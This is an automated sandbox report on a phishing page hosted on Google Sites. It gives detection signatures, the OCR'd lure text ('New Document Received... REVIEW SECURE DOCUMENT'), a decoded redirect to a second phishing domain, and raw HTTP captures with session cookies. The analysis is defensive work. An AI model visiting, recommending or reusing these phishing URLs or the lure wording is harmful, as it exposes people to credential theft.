Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://sites.google.com/ceqy.com/rfp/home

Overview

General Information

Sample URL:https://sites.google.com/ceqy.com/rfp/home
Analysis ID:1562628
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish20
AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
HTML page contains hidden javascript code

Classification

  • System is w10x64
  • chrome.exe (PID: 3616 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2304 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2200,i,17206734623280546298,7125097228973372212,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6400 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sites.google.com/ceqy.com/rfp/home" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.1.pages.csvJoeSecurity_HtmlPhish_20Yara detected HtmlPhish_20Joe Security
    1.2.pages.csvJoeSecurity_HtmlPhish_20Yara detected HtmlPhish_20Joe Security
      1.5.pages.csvJoeSecurity_HtmlPhish_20Yara detected HtmlPhish_20Joe Security
        1.0.pages.csvJoeSecurity_HtmlPhish_20Yara detected HtmlPhish_20Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://j9.valcondunar.com/favicon.icoAvira URL Cloud: Label: phishing

          Phishing

          barindex
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: Yara matchFile source: 1.5.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: https://sites.google.com/ceqy.com/rfp/homeJoe Sandbox AI: Page contains button: 'REVIEW SECURE DOCUMENT' Source: '1.0.pages.csv'
          Source: Chrome DOM: 1.1OCR Text: New Document Received You've received (2) new PDF Documents for your review Please sign & return REVIEW SECURE DOCUMENT
          Source: https://j9.valcondunar.com/b3k54/HTTP Parser: Base64 decoded: https://pdnx44qT4JC9hFrIRPUsRYx1oviOC0DvHgbhb3M2omXqVfH0mO2HI2Yg.trantleamag.com/FNOSLVHiRAXYxKvGvdBQdxxPQVUOGGSPQKPLVUZOKHDOUUUHWYEYDSEVGTXGQJCI
          Source: https://j9.valcondunar.com/b3k54/HTTP Parser: No favicon
          Source: https://j9.valcondunar.com/b3k54/HTTP Parser: No favicon
          Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49750 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.18.109.164:443 -> 192.168.2.4:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49806 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49807 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 2.18.109.164
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
          Source: unknownTCP traffic detected without corresponding DNS query: 2.20.68.201
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /js/client.js?onload=gapiLoaded HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=gdyYGrV8wKESt6T7PJLfWqt4Fh4r5I8B97r0VfkrSsZYkNs9vowLpX0djHp_EkSdUswtFE_sLpxHs7b6849m7NndCgLPAVG8HqCcH_dihgE4Hhscjgw_FuB7NL3gBhSStO8oWnVObBaYEPOp3WCdhOe5I9Pgs_3PCmwsXD9O8mEyNYNyWCgb8nxu
          Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.lb.en.6zM9SN8ON8Q.O/m=client/rt=j/sv=1/d=1/ed=1/am=AAAg/rs=AHpOoo9LiInNUyZ6A99oK9HdmPXGee7Zyg/cb=gapi.loaded_0?le=scs HTTP/1.1Host: apis.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=gdyYGrV8wKESt6T7PJLfWqt4Fh4r5I8B97r0VfkrSsZYkNs9vowLpX0djHp_EkSdUswtFE_sLpxHs7b6849m7NndCgLPAVG8HqCcH_dihgE4Hhscjgw_FuB7NL3gBhSStO8oWnVObBaYEPOp3WCdhOe5I9Pgs_3PCmwsXD9O8mEyNYNyWCgb8nxu
          Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+t9dwrlzm24OzzO&MD=yBmHFA61 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=lfnz-h9w4v30OY_tcc_TmPU4OC1amR6gPPpSDMXGrjBiTZpW2U0SRPj_6EKYWq4TmLYYslTn75u0Guf-EHyc-CT450RGPSVyRWU61VJ7GBi44QhdoQr8JGDWs6dskmz7Vc9c_pY7CQMCUzBY4k6Q5bWs5ihSz8NVo052UGCmRKlWp337UVfWbjYt_R5zGtvn
          Source: global trafficHTTP traffic detected: GET /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=VtVOjXt6zuhy-2YKtTERKDmpWoK0o-Dj_kJNfbc4lzsHckeG-pox1jah9rbPwMfgsCbFlReKUmAtgYnXmJ2O0IA7HHWm8Hq8HDUMgvf80mMHXbVBw5H4uNG50lSf57Ofx3gSXdLSNi9i42fTEUs34VcDQXfj8bzivXWpPGJg99XByGFGMXxxp0FNZbckcA28
          Source: global trafficHTTP traffic detected: GET /url?q=https%3A%2F%2Fj9.valcondunar.com%2Fb3k54%2F&sa=D&sntz=1&usg=AOvVaw0HL9wZZbhgOP55-NM_TPJg HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://sites.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=519=VtVOjXt6zuhy-2YKtTERKDmpWoK0o-Dj_kJNfbc4lzsHckeG-pox1jah9rbPwMfgsCbFlReKUmAtgYnXmJ2O0IA7HHWm8Hq8HDUMgvf80mMHXbVBw5H4uNG50lSf57Ofx3gSXdLSNi9i42fTEUs34VcDQXfj8bzivXWpPGJg99XByGFGMXxxp0FNZbckcA28
          Source: global trafficHTTP traffic detected: GET /b3k54/ HTTP/1.1Host: j9.valcondunar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://j9.valcondunar.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://j9.valcondunar.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: j9.valcondunar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://j9.valcondunar.com/b3k54/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IktuUmNPVmhkM09vdnRKWlMzMmJ6WlE9PSIsInZhbHVlIjoiSGNKdUFlZHM4Y2Q0Mnh5eGpLRmpHVkZra2VJNDNlZHkwVWI3cEkxdDlKZDNZWkU5VWxyUjN3ZzdTaVFlSEVkd0cyUk5zUHRHMC9WZXhhTDhRTktsTE1wRGdEc293cjZwRW5ieTNuNTdiWlBUZTVYUlY3T3owVGp6RG1Kem1NWEsiLCJtYWMiOiJjYTY3MDFhMDE4OWQ2MDJhMjQzNmViMDhmYzg1Mzg3ZGU3NGFiZjc4ZWFkZjhkZWIwZTYwNGMyYzczYmEwYzQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IllsdU9xUDZwVXZiWm9Rb3ZIS2FBMkE9PSIsInZhbHVlIjoiVWxhS2hCdlZSbGl0VHF0cXI4YXl4Mk9LdUZ2bDM4YnU0OUFWM2ZOaHU4MjhZTW9HRTRSN2puLzVQbUZCVURKTWZWbC9GRGd4UVdtbVptQXJBeWFxTHZmVDFrek9qc0NVVTRQcmI1bUVHMVdMMjUvM1ZpMHJhLzJ2Wi9GUklISlEiLCJtYWMiOiIxMWI1YWFlOTFkOWNlODRlMGQ3ODFlZDc4ZTIwMmUzN2UzZjQ3ZjkwMjI0ZDE2MTYxMjZhNzYwMDgyNDkwMTFlIiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /img/b/R29vZ2xl/AVvXsEgdrhY6zM7txEf61nPO67_Cl7rOyCGsyEb9GaIEqe3M-p-yN2nJeBUGCXkDygK7t8xYVcKwSgu4v0_u6EZF5srUh16p0vNl1K8hBeBV8dg-KcOpt7y8vrkamMOU2HxW0STp0JDEp21FWuCWxDXZX0EtxoLPSBWR6WwhXZglXIvWXbh24ojuyofD6htY8D4/s3396/userinter.png HTTP/1.1Host: blogger.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=+t9dwrlzm24OzzO&MD=yBmHFA61 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
          Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
